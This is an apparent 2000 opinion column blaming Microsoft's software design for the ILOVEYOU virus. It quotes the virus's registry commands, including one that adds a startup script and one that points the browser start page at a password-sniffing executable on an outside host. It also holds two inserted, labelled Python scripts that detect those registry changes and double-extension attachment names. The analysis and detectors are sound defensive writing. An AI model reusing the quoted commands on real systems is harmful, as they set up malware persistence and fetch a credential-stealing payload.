Love, Microsoft

May 9 2000 9:00 PM

Who's to blame for the "ILOVEYOU" virus? Who else??

See below for Microsoft's response.

Here's some instant mythology surrounding the "ILOVEYOU" virus:

It attacked computers.

Any technology can be used for good or for evil.

It was spread by careless, ill-educated (and love-starved!) consumers, who clicked where they shouldn't have.

In reality, of course, the virus attacked and exploited software, not the computers themselves. That may seem like a pedantic distinction, and it's true that these days the line between hardware and software can be fuzzy. But computers themselves can have bugs, and they can have security holes, and that wasn't the case with the "love bug." In fact, the virus targeted the Microsoft Windows Scripting Host, Microsoft's Outlook mail program, Microsoft Internet Explorer, the Microsoft Windows Address Book, and the Microsoft Windows registry. It propagated by means of security flaws created by Microsoft software engineers. No one running MacOS or Unix could have spread this virus or any virus like it.

Microsoft's public comment has run: "There's always the potential for misuse. More important than the technical side of this is the human side. It's not something technology is ever going to be able to solve." It's a cliché that technology is value-neutral—a cliché employed in the service of a variety of causes. There's always some truth to the idea. Nuclear fission is just what it is, a piece of physics. Guns don't kill people, people kill people. But we're allowed to notice when particular technologies are especially dangerous. Some technologies actively invite misuse.

So here's what the ILOVEYOU virus did, and here's why it shouldn't have been able to:

  • It looked up some settings in the registry, Windows' core database of system settings, and then it changed those settings. For example, by default, scripts are given only 10 seconds to do whatever they do. So this script began by looking up this "timeout" feature and turning it off. Oops! Scripts shouldn't be allowed to override settings that control those same scripts.
  • Then it changed some more registry settings, with statements like regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs", which instructs the system to run a new script every time it starts up. Scripts shouldn't be allowed to alter anything in the registry—not without direct approval from a system administrator and especially not from inside an e-mail message. Microsoft knows this, in principle: Look here, for example. But it chose to leave the door open.
  • Then the script changed the start page of the (Microsoft) Web browser. In fact, it pointed the browser not at a Web site but at an executable file: regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe". No! Don't go there. (Sure enough, the function of this program was to sniff for passwords.) It would be safer to require user intervention before changing the browser's start page. But Microsoft wanted to make it easy for companies like, oh, Microsoft, to change your start page for you.
  • In a subroutine cunningly titled "sub infectfiles," the virus copied itself—a nice, compact little script, after all—to files all over the user's hard disk, deleting some files and sneakily renaming others. Now, this is suspicious and dangerous behavior. An operating system has to support the deletion and renaming and alteration of files, but it doesn't have to give this capability to scripts—little programs run from inside e-mail messages or through the Web browser. These powerful abilities came with the Windows Scripting Host, not a part of Windows 95, but added to later systems, including any that got Internet Explorer Version 5. (Maybe the ILOVEYOU author read Microsoft TechNet's article on "Leveraging the Power of the Windows Scripting Host." "The script we've demonstrated may be the foundation for a greater task," it concludes cheerfully. "Once you've located a file, you may wish to perform a file copy or an FTP process.")
  • Finally, as we all now know, the virus performed a mass mailing of itself to everyone in the user's Outlook address book. Cute, and sometimes Microsoft customers do need to send mass mailings, but they don't need to be able to do it with scripts running from inside e-mail messages. Not ever. Close that door.
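A defender's check for the two registry changes described in the list above, added here as an example and not taken from the article or from Microsoft: it scans a regedit text export for Run-key entries that launch a script and for a browser start page that points at a program. The sample export, its file paths and the URL host are constructed for illustration; the function name audit and the finding labels are this example's own.

```python
import re

# Key paths are the ones quoted in the article, lower-cased for comparison.
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
IE_MAIN_KEY = r"hkey_current_user\software\microsoft\internet explorer\main"

SCRIPT_RE = re.compile(r"\.(vbs|vbe|jse|js|wsf)\b", re.I)  # script named in the command
EXE_URL_RE = re.compile(r"\.(exe|scr|pif)(\?|#|$)", re.I)  # URL that ends in a program
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample in regedit export format. The file paths and the URL host
# are made up; MSKernel32 and WIN-BUGSFIX.exe are the names the article quotes.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://host.example/WIN-BUGSFIX.exe"
'''


def audit(export_text):
    """Return (finding, value_name, data) tuples for suspicious string values."""
    findings, key = [], None
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()          # entering a new registry key
            continue
        m = VALUE_RE.match(line)
        if key is None or not m:
            continue                          # header, blank line, non-string value
        name = m.group(1)
        data = re.sub(r"\\(.)", r"\1", m.group(2))   # undo .reg backslash escaping
        if key == RUN_KEY and SCRIPT_RE.search(data):
            findings.append(("autorun-script", name, data))
        elif key == IE_MAIN_KEY and name.lower() == "start page" and EXE_URL_RE.search(data):
            findings.append(("startpage-executable", name, data))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORT):
        print(finding)
```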

In recent years, Microsoft's designers have deliberately blurred the distinction between opening some data and running a program. To run Word, you no longer have to find the program and execute it. You can run Word indirectly, just by clicking on any Word document, identified by its filename, ending with the three-letter extension .doc. In the same way, if you click on a music file in the .mp3 format, you will execute a music player—by default, of course, Microsoft's own Media Player. The virus executed the Windows Scripting Host because it ended with the extension .vbs.

Which leads to one more lovely detail. Most of us rarely see those file extensions because the operating system hides them by default. That's another user-friendly feature: Instead of "Letter to Bill.doc," we see just "Letter to Bill." Speaking personally, I like this feature. I know that some security experts advise users to turn the feature off, but so far I've been willing to accept Microsoft's default setting and leave the extensions hidden. The ILOVEYOU virus exploited this by adding an extra fake extension to its name: "LOVE-LETTER-FOR-YOU.TXT.vbs." We users saw only the innocent-looking "LOVE-LETTER-FOR-YOU.TXT." The final, hidden, .vbs was the trigger.

Thus Windows gave us the worst of both worlds: It was smart enough to display and yet disregard the ".TXT" that would have started a harmless text editor. It was smart enough to conceal and yet execute the ".vbs." Microsoft should have been smart enough to take an obvious precaution in the first place: Prevent the creation of file names with double extensions. That kind of file name is a sure tip-off that someone is up to no good.
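The display-versus-execute mismatch described above, as an added example that is not from the article: a mail-gateway style check that computes the name a user sees when known extensions are hidden, the extension that actually selects the handler, and a verdict. The extension lists, the verdict labels and the function name classify are assumptions made for this example, and it flags only a harmless-looking extension followed by an executable one rather than every name with two dots.

```python
import os
import re

# Illustrative lists for this example, not exhaustive.
EXECUTABLE_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                   ".exe", ".scr", ".pif", ".bat", ".cmd", ".hta"}
DECOY_EXTS = {".txt", ".doc", ".jpg", ".gif", ".mp3", ".htm", ".html"}
KNOWN_EXTS = EXECUTABLE_EXTS | DECOY_EXTS   # types whose extension gets hidden


def classify(filename):
    """Return (name_the_user_sees, extension_that_runs, verdict)."""
    # Keep only the leaf name; Windows ignores trailing dots and spaces.
    name = re.split(r"[\\/]", filename)[-1].rstrip(" .")
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    inner = os.path.splitext(stem)[1].lower()
    shown = stem if ext in KNOWN_EXTS else name
    if ext in EXECUTABLE_EXTS and inner in DECOY_EXTS:
        verdict = "block"        # harmless-looking extension shown, script type hidden
    elif ext in EXECUTABLE_EXTS:
        verdict = "quarantine"   # executable type, no disguise
    else:
        verdict = "allow"
    return shown, ext, verdict


# Constructed attachment names; the first is the one the article quotes.
SAMPLES = ["LOVE-LETTER-FOR-YOU.TXT.vbs", "Letter to Bill.doc",
           "notes.v2.txt", "cleanup.VBS"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "->", classify(s))
```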

Even after the fact, Microsoft continues to take a "Close the Barn Door" approach to security. It recommends with a straight face that users now delete all e-mail messages with the subject "ILOVEYOU." And the Microsoft Web site stresses (here):